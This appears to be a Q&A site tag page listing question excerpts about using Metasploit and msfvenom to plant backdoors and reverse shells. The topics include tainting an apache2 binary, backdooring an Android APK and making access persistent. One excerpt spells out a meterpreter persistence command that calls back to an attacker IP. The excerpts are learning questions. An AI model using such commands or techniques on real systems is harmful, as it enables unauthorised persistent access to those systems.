Skip to main content

All Questions

Tagged with
1vote
2answers
1kviews

How payloads provide backdoors when the victims are out of local network [duplicate]

I am a newbie in cyber security and trying to learn how payloads provide backdoors when the victims are out of the local network. I know that metasploit is a good tool for making payloads, and using ...
Not a Salmon Fish's user avatar
0votes
1answer
3kviews

metasploit: how to use linux/http/webmin_backdoor

I am trying to gain access to a server using CVE-2019-15107 with help of metasploit. I tried to find examples of its usage, but I found none. My machines ip is 192.168.109.133. I am connected to a vpn ...
Mr Krisey's user avatar
0votes
0answers
545views

msfvenom: backdoored apk

I am using msfvenom to backdoor an Android apk. It is supposed that msfvenom adds extra permissions to original AndroidManifest: [*] Poisoning the manifest with meterpreter permissions.. [*] Adding &...
elena.bdc's user avatar
0votes
0answers
2kviews

How to make metasploit backdoor persistent in Android?

I created a payload with msfvenom and installed it on Android smartphone, but after a reboot or long time without use, it stops working, because the OS kills the process. Is there any way to ...
mrlucasrib's user avatar
1vote
1answer
3kviews

Metasploit: Executables are not working after Reverse Shell

I tried connecting to a windows box and create a reverse shell back to my Kali Linux machine. Reverse shell is created and I get the meterpreter prompt. Commands Used: Payload: windows/shell/...
Suraj's user avatar
0votes
1answer
5kviews

proftpd backdoor not backdoored

I wanted to practice exploiting system using proftpd backdoor. I use the exploit proftpd_133c_backdoor and the payload reverse_perl.I learned on how to exploit using this link, https://www.youtube.com/...
Abdullah Naina's user avatar
3votes
1answer
3kviews

How does metasploit persistence work?

When we remote exploit a target with meterpreter, we can use the command run persistence -U -i 10 -p 12345 -r 192.168.1.1 to make a persistent program that will try to connect to the machine which IP ...
Sidahmed's user avatar
0votes
1answer
2kviews

Injecting meterpreter/reverse_tcp into apache2 with msfvenom results in seg fault of apache2

I've been trying to use msfvenom with the linux/x86/meterpreter/reverse_tcp payload and an apache2 binary. My intent is to create a tainted version of apache2 to establish a persistent backdoor on the ...
Nick Roth's user avatar
4votes
1answer
220views

Architecture dependency issue associated with malicious payloads

My question is regarding architectural restrictions associated with backdoor/bind/reverse tcp payloads used typically to gain shell through exploitation. In a situation where the target box ...
Sh1nu11bi's user avatar
0votes
2answers
1kviews

can a backdoor executable be used on an occupied port?

Suppose I am doing a penetration test on a network that has a firewall that blocks all ports except 80, 110, and 443. I want to use a metasploit reverse-TCP backdoor executable written in msfpayload ...
Mike's user avatar

close